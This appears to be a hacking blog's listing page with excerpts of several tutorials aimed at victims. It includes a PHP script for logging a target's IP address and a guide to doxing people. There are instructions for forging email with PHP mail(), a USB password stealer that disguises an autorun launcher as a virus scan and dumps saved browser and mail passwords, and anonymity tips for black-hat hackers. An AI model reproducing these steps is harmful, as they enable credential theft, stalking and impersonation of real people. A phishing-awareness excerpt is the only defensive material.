Skip to main content

Posts

Showing posts with the label Hacking

How To Grab Someone's IP Address ?

In this tutorial I will you show you how to grab someone’s IP address using  PHP script.  This method can be used to grab someone Ip address on yahoo or Facebook  chat  or by sending mail to victim. So Lets get started. How To  Hack  Someone Ip Address ? 1. Copy the below codes into  Notepad  and save it as  Grab.php  (.php is must)  <?php $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); $img_number = imagecreate(400,95); $backcolor = imagecolorallocate($img_number,10,102,153); $textcolor = imagecolorallocate($img_number,255,255,255); imagefill($img_number,0,0,$backcolor); $number0 = " This is Your IP/Proxy"; $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]"; $number2 = " Host/Proxy: $hostname"; $number4 = " _________________________________"; Imagestring($img_number,10,5,5,$number0,$textcolor); Imagestring($img_number,10,5,25,$number1,$textcolor); Imagestring($img_number,10,5,45,$number2,$textcolor); Imagestring($img_

What Is Doxing? Doxing and its Uses............

You’re probably thinking, “O kay, so basically it’s getting information from searching someone’s email on Google right? ” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called   Pipl (http://www.pipl.com/) . Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is   Facebook (http://www.facebook.com) . Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its  email search . The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your  passport online ; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into

How to Check The email is original or Not

First of all let us see How email system is working over internet. The email is sent on internet as shown in below picture So Here The Sender i.e abc@server1.com is sending a mail to xyz@server2.in. so the sender will type the mail and click on send button and the mail will go to SERVER1.com whereSERVER1.com will forward the mail over internet and the internet will search the xyz@server2.in email ids server and send it to SERVER2.in and the the SERVER2.in will search for the xyz@server2.in in their own database and then the mail will be forwarded to xyz@server2.in and when the XYZ user login to their account they will see an email in their inbox which is from abc@server1.com. Now How To send the fake mail To send fake mail We need to Bypass the abc@server1.com and SERVER1.com both and directly send an email over internet . So for that we will use a .php script as php has a function mail(); which can send email to any one without the SERVER1.com and directly deliver

What is A PHISHING attack ? And how to avoid it.....

Phishing    The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.    The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is Bogus and set up only to steal the User’s information. Phishing scams could be   Emails inviting you to join a Social Group, asking you to Login using your Username and Password.   Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.   Emails containing some Information of your Interest and asking you to Login to Your Account.   Any Email carrying a Link to Click and asking you to Login. Prevention against Phishing   Read all the Email Carefully and

How to Trace Any IP Address

How to Trace the IP Address Back to the Source? In fact, tracing an IP address back to its location is a lot simpler than what many people imagine. There exists many online tools using which you can accomplish this job. One of my favorite site is  IP2Location.com . Just go to  http://www.ip2location.com/demo.aspx  and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address: Country  in which the IP is located City  to which the IP address belongs to Latitude/Longitude  of the IP’s location Zip Code  of the region to which the IP belongs to Time Zone  associated with the IP Name of the ISP  to which the IP address belong to Internet Speed  of the computer associated with the IP Weather Station  associated with the region of the IP Domain name  associated with the IP address A sample snapshot of the results from ip2loca

How to make a USB PASSWORD STEALER

Guyz in this Tutorial i will tell you how to Steal/Hack someone’s computer passwords through USB Flash Drive…                             As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords. Step 1 : Create New/open notepad/wordpad… Type or copy/paste Red Text below:- [autorun] open=launch.bat ACTION= Perform a Virus Scan Save this as  AUTORUN.inf Step 2 : Open a new notepad/wordpad document… Type or copy/paste Red Text below… start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start PasswordFox.exe /stext passwordfox.txt start OperaPassView.ex

Staying Anonymous

If you are planning to be Black/ Grey/ Green Hat hacker, then you will be really worried about you anonymity. What concerns you most have to be "How to stay Anonymous?" . So here are some methods to stay anonymous. These are only some basic anonymity techniques and the more advanced techniques will be lectured in the following tutorials. VPN                                                                                      VPN is the acronym of Virtual Private Network. As from a hacker's point of view, here are the facts that justifies its need: 1) Counterfeit the ISP's packet detection measures.      Maintain your anonymity and boost by keeping your ISP from throttling, inspecting and prioritizing the data sent to and from your system. 2) Keep your IP address anonymous.      Prevent the places your packets are traversing from identifying your connection information and location. 3) Hide your online activities from third parties.      As a VPN provid

How To Reveal Hidden Passwords (Asterisks) In Web Browsers

In many places where you need to input your password to gain access, authorize or confirm a transaction, whenever you type passwords into the input text box, the characters automatically turns into asterisks or bullets. This is to protect your password from straying eyes. However, in situations that require you to  know what lies behind those asterisks , we’ve got a simple trick to  reveal the passwords on your web browsers . These hidden passwords are disguised with the help of simple HTML and CSS. So just changing the value of something specific will easily reveal what’s behind those bullets or astericks. We’ll show you how this is done in Google Chrome and Firefox. Google Chrome In any website which contains your saved password,  right click  on the  password box  and click on  Inspect elem ent . You’ll now notice the bottom quarter of your screen filled with codes. You only need to focus on the  highlighted (in blue) part  to reveal the password.